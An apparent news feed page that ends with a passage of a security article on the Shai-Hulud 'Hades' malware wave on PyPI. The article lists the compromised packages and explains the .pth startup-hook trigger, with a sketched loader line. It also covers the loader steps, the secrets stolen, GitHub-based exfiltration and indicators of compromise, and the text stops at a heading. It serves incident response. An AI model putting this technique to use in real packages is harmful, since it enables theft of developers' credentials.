<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/microsoft-foundry-build-2026-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-microsoft-unlocks-visual-studio-for-developers-left-behind-by-its-own-ai" class="group relative scroll-mt-24">
        <a href="#h3-microsoft-unlocks-visual-studio-for-developers-left-behind-by-its-own-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Microsoft unlocks Visual Studio for developers left behind by its own AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-microsoft-unlocks-visual-studio-for-developers-left-behind-by-its-own-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Microsoft used its Build 2026 conference last week to announce a series of updates to its flagship Visual Studio IDE The post Microsoft unlocks Visual Studio for developers left behind by its own AI a</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/microsoft-visual-studio-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-teams-now-deploy-1000-times-a-month-your-pipeline-wasnt-built-for-that" class="group relative scroll-mt-24">
        <a href="#h3-ai-teams-now-deploy-1000-times-a-month-your-pipeline-wasnt-built-for-that" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI teams now deploy 1,000 times a month. Your pipeline wasn’t built for that.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-teams-now-deploy-1000-times-a-month-your-pipeline-wasnt-built-for-that"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>There’s mounting evidence that AI coding tools are delivering on their less outlandish promises. With adoption shifting from 76% in The post AI teams now deploy 1,000 times a month. Your pipeline wasn</p>
<p><strong>📅 Jun 7, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/ai-deployment-pipeline-velocity/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-microsoft-just-made-the-agent-runtime-free-and-kept-everything-around-it" class="group relative scroll-mt-24">
        <a href="#h3-microsoft-just-made-the-agent-runtime-free-and-kept-everything-around-it" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Microsoft just made the agent runtime free — and kept everything around it
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-microsoft-just-made-the-agent-runtime-free-and-kept-everything-around-it"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Microsoft has the engineers to build its own agent runtime. At Build 2026 last week, it chose not to, shipping The post Microsoft just made the agent runtime free — and kept everything around it appea</p>
<p><strong>📅 Jun 7, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/microsoft-scout-openclaw-runtime/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ai-is-accelerating-devops-poor-integrations-are-slowing-it-down" class="group relative scroll-mt-24">
        <a href="#h3-ai-is-accelerating-devops-poor-integrations-are-slowing-it-down" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AI Is Accelerating DevOps, Poor Integrations Are Slowing It Down
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ai-is-accelerating-devops-poor-integrations-are-slowing-it-down"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As AI speeds up software delivery, the real bottleneck isn’t scanning or CI. It’s how safely and predictably change moves across tools, teams, and companies. Something strange is happening in DevOps r</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ai-is-accelerating-devops-poor-integrations-are-slowing-it-down/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ironworm-malware-shares-shai-hulud-traits-takes-threat-to-next-level" class="group relative scroll-mt-24">
        <a href="#h3-ironworm-malware-shares-shai-hulud-traits-takes-threat-to-next-level" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 IronWorm Malware Shares Shai-Hulud Traits, Takes Threat to ‘Next Level’
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ironworm-malware-shares-shai-hulud-traits-takes-threat-to-next-level"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Open source software developers continue to come under attack, with the latest threat being a custom malware that shares many of the attributes of the notorious Shai-Hulud self-propagating worm but co</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ironworm-malware-shares-some-shai-hulud-traits-but-takes-it-to-next-level/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem" class="group relative scroll-mt-24">
        <a href="#h3-cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cloudflare Acquires VoidZero to Advance Open Source Vite Ecosystem
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Cloudflare this week acquired VoidZero, the maintainer of open source tools such as Vite, Vitest, Rolldown, Oxc, and Vite+ that are used widely to build web application frameworks. Rita Kozlov, vice p</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/cloudflare-acquires-voidzero-to-advance-open-source-vite-ecosystem/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-zig-isnt-10-yet" class="group relative scroll-mt-24">
        <a href="#h3-why-zig-isnt-10-yet" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Zig Isn’t 1.0 (Yet)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-zig-isnt-10-yet"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most programming languages follow a familiar trajectory: early experimental releases, rapid iteration, and then – at some point – a 1.0 version that signals stability and the potential for serious ado</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/blog/2026/06/05/why-zig-isn-t-1-0-yet/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-java-annotated-monthly-june-2026" class="group relative scroll-mt-24">
        <a href="#h3-java-annotated-monthly-june-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Java Annotated Monthly – June 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-java-annotated-monthly-june-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A fresh edition of Java Annotated Monthly has landed! The world of software development keeps moving at full speed, and this month’s selection helps you keep up without drowning in tabs. Inside, you’l</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/idea/2026/06/java-annotated-monthly-june-2026/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-beyond-tokens-per-watt-using-ubuntu-2604-lts-for-ai" class="group relative scroll-mt-24">
        <a href="#h3-beyond-tokens-per-watt-using-ubuntu-2604-lts-for-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Beyond tokens per watt – using Ubuntu 26.04 LTS for AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-beyond-tokens-per-watt-using-ubuntu-2604-lts-for-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Tokens per watt (TpW) – the measure of useful AI work produced per watt of energy consumed – is the metric at top of mind for CEOs, heads of AI, and infrastructure teams alike. With the tremendous cos</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/beyond-tokens-per-watt"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cyber-resilience-act-cra-how-suse-provides-innovation-and-trust-in-the-secure-software-era" class="group relative scroll-mt-24">
        <a href="#h3-cyber-resilience-act-cra-how-suse-provides-innovation-and-trust-in-the-secure-software-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cyber Resilience Act (CRA): How SUSE Provides Innovation and Trust in the Secure Software Era
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cyber-resilience-act-cra-how-suse-provides-innovation-and-trust-in-the-secure-software-era"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The European Union’s Cyber Resilience Act (CRA) represents a historic evolution in the global digital landscape. Rather than viewing it as a regulatory hurdle, forward-thinking enterprises recognize t</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/cyber-resilience-act-compliance-suse/"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Shai-Hulud Reaches PyPI: The Hades Wave That Runs Before You Import It]]></title>
      <link>https://devops-daily.com/posts/shai-hulud-hades-pypi-wave-june-2026</link>
      <description><![CDATA[The Shai-Hulud worm jumped to PyPI on June 7. The Hades wave hides in 19 Python packages, runs at interpreter startup through a .pth hook before you import anything, and steals your CI/CD secrets.]]></description>
      <pubDate>Sun, 07 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/shai-hulud-hades-pypi-wave-june-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[PyPI]]></category><category><![CDATA[Python]]></category><category><![CDATA[Security]]></category><category><![CDATA[Shai-Hulud]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[CICD]]></category>
      <content:encoded><![CDATA[<p>On June 7, 2026, the Shai-Hulud worm reached PyPI in a way it had not before. Earlier waves rode npm install hooks and Packagist. This one, which Socket tracks as the &quot;Hades&quot; branch of the Shai-Hulud/Miasma family, hides inside Python wheels and runs the moment your interpreter starts, before you import anything from the package.</p>
<p>That detail matters. Most people picture a malicious package as something that fires when you <code>import</code> it, or at worst during a build step you can sandbox. Hades runs through a Python startup hook, so a single <code>pip install</code> of a poisoned wheel is enough to execute the payload on the next interpreter start, on your laptop or on a CI runner. Once it runs, it goes after exactly what a build machine tends to hold: GitHub tokens, PyPI and npm publishing tokens, cloud credentials, and SSH keys.</p>
<p>This is the same worm family behind the <a href="/posts/mini-shai-hulud-pytorch-lightning-supply-chain-attack">PyTorch Lightning incident</a> and the <a href="/posts/antv-npm-shai-hulud-wave-may-2026">AntV npm wave</a>. The tradecraft is familiar, but the Python delivery is new. This post is the practical version: what shipped, how the startup trick works, the indicators to grep for, and the order to rotate secrets if you were exposed.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>New Shai-Hulud wave on PyPI, June 7, 2026, tracked as the &quot;Hades&quot; branch. Socket counted 37 malicious wheels across 19 PyPI packages, plus a parallel npm campaign of 411 artifacts across 106 packages.</li>
<li>It looks like a single maintainer-account takeover. Consecutive patch releases were mass-published across the author&#39;s whole portfolio at once.</li>
<li>The wheels carry a <code>.pth</code> startup hook that runs at interpreter startup, with no import required, then downloads Bun and runs an obfuscated JavaScript stealer.</li>
<li>It steals GitHub, PyPI, npm, cloud (AWS, GCP, Azure), Kubernetes, and Vault credentials, plus <code>.env</code>, <code>.npmrc</code>, <code>.pypirc</code>, and AI tool configs, then exfiltrates to attacker-created public GitHub repos.</li>
<li>High-download research packages were hit, including <code>dynamo-release</code>, <code>spateo-release</code>, <code>coolbox</code>, and <code>ufish</code>. PyPI quarantined a number of releases, and Socket flagged the cluster minutes after publication.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>You install Python packages with <code>pip</code>, <code>uv</code>, or <code>poetry</code>, or your CI does</li>
<li>You publish to PyPI, or your build runners hold GitHub or cloud credentials</li>
<li>Basic comfort with the shell and, for the org audit, the GitHub CLI (<code>gh</code>)</li>
</ul>
<h2 id="h2-what-shipped" class="group relative scroll-mt-24">
        <a href="#h2-what-shipped" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What shipped
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-shipped"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Socket&#39;s analysis puts the PyPI side at 37 malicious wheel artifacts across 19 packages, with 411 artifacts across 106 packages on the npm side of the same campaign, for 448 tracked artifacts in total. The pattern on PyPI was a burst of consecutive patch releases across one author&#39;s entire portfolio, which points to a compromised maintainer account rather than 19 separate attacks.</p>
<p>The painful part is that several of the affected packages are real research tools with hundreds of thousands of cumulative downloads:</p>
<ul>
<li><code>dynamo-release</code>, a single-cell RNA velocity framework</li>
<li><code>spateo-release</code>, a spatial transcriptomics toolkit</li>
<li><code>coolbox</code>, a Jupyter genomic visualization library</li>
<li><code>ufish</code> and <code>napari-ufish</code>, deep-learning FISH spot detection</li>
</ul>
<p>The full set of 19 compromised PyPI packages:</p>
<pre><code class="hljs language-text">bramin            cmd2func          coolbox
dynamo-release    executor-engine   executor-http
funcdesc          magique           magique-ai
mrbios            napari-ufish      nucbox
okite             pantheon-agents   pantheon-toolsets
spateo-release    synago            ufish
uprobe
</code></pre><p>If any of these are in your environment, treat the host as compromised and work through the response section below.</p>
<h2 id="h2-how-the-hades-wave-works" class="group relative scroll-mt-24">
        <a href="#h2-how-the-hades-wave-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How the Hades wave works
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-the-hades-wave-works"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The clever, and genuinely new, part is the trigger. Each malicious wheel ships two files: a startup hook named like <code>*-setup.pth</code>, and an obfuscated JavaScript payload named <code>_index.js</code>.</p>
<h3 id="h3-the-pth-startup-trick" class="group relative scroll-mt-24">
        <a href="#h3-the-pth-startup-trick" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The .pth startup trick
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-pth-startup-trick"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Python&#39;s <code>site</code> module processes every <code>.pth</code> file in your <code>site-packages</code> directory at interpreter startup. Normally a <code>.pth</code> file just adds directories to the import path. But there is a documented behavior: any line that begins with <code>import</code> is executed. Hades abuses exactly that.</p>
<pre><code class="hljs language-text"># A normal .pth file just lists paths:
../some/extra/path

# Hades ships a line that starts with &quot;import&quot;, so Python RUNS it
# every time the interpreter starts, with no package import needed:
import os; exec(&lt;loader that finds and runs _index.js&gt;)
</code></pre><p>This converts a one-time <code>pip install</code> into automatic execution on the next <code>python</code> invocation. You do not have to import the package. You do not even have to run the project that depends on it. Any Python process on the machine triggers it.</p>
<h3 id="h3-bring-your-own-runtime" class="group relative scroll-mt-24">
        <a href="#h3-bring-your-own-runtime" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Bring your own runtime
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-bring-your-own-runtime"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The Python loader does not assume Node.js or any particular runtime is present. It:</p>
<ol>
<li>Checks for a sentinel file at <code>&lt;tempdir&gt;/.bun_ran</code> and exits early if it exists</li>
<li>Locates <code>_index.js</code> inside the installed package</li>
<li>Downloads Bun v1.3.13 from <code>github.com/oven-sh/bun</code> if no cached binary is around</li>
<li>Runs <code>bun run _index.js</code></li>
<li>Writes the sentinel so it does not fire repeatedly</li>
</ol>
<p>Downloading its own runtime is a Shai-Hulud signature. It means the payload runs the same way whether or not the victim has Node installed, which is why a Python-only shop is not safe just because it has no npm toolchain.</p>
<h3 id="h3-the-stealer" class="group relative scroll-mt-24">
        <a href="#h3-the-stealer" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The stealer
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-stealer"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p><code>_index.js</code> is wrapped in several layers: an <code>eval</code> shell with character-code and rotation decoding, AES-128-GCM and AES-256-GCM stages, gzip, custom PBKDF2/SHA256 decoders, and decoy tokens to slow analysis. It also checks the environment, skipping execution under a Russian locale and watching for StepSecurity harden-runner.</p>
<p>Once decoded, it harvests a wide set of secrets:</p>
<ul>
<li>GitHub tokens, GitHub Actions runner secrets, and SSH keys</li>
<li>Publishing tokens for npm, PyPI, RubyGems, JFrog, and CircleCI</li>
<li>AWS, GCP, Azure, Kubernetes, and HashiCorp Vault credentials</li>
<li><code>.env</code>, <code>.npmrc</code>, <code>.pypirc</code>, Docker configs, shell history, and cloud CLI caches</li>
<li>Claude and MCP configuration files</li>
</ul>
<h3 id="h3-exfiltration" class="group relative scroll-mt-24">
        <a href="#h3-exfiltration" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Exfiltration
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-exfiltration"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The primary channel is GitHub itself. The payload uses a stolen token to create a public repository via <code>POST /user/repos</code>, then commits the encrypted results to paths like <code>results/results-&lt;timestamp&gt;-&lt;counter&gt;.json</code>. The campaign markers are blunt:</p>
<ul>
<li>Repository description: <code>Hades - The End for the Damned</code></li>
<li>Commit message marker: <code>IfYouYankThisTokenItWillNukeTheComputerOfTheOwnerFully</code></li>
<li>On CI, a GitHub Actions artifact named <code>format-results</code> and a workflow named <code>Run Copilot</code></li>
</ul>
<p>There is also traffic to <code>https://api.anthropic.com/v1/api</code>. That is Anthropic&#39;s real API host, but <code>/v1/api</code> is not a real route. Socket assesses it as network-log camouflage, traffic designed to look benign rather than to move data.</p>
<h3 id="h3-what-is-new-this-time" class="group relative scroll-mt-24">
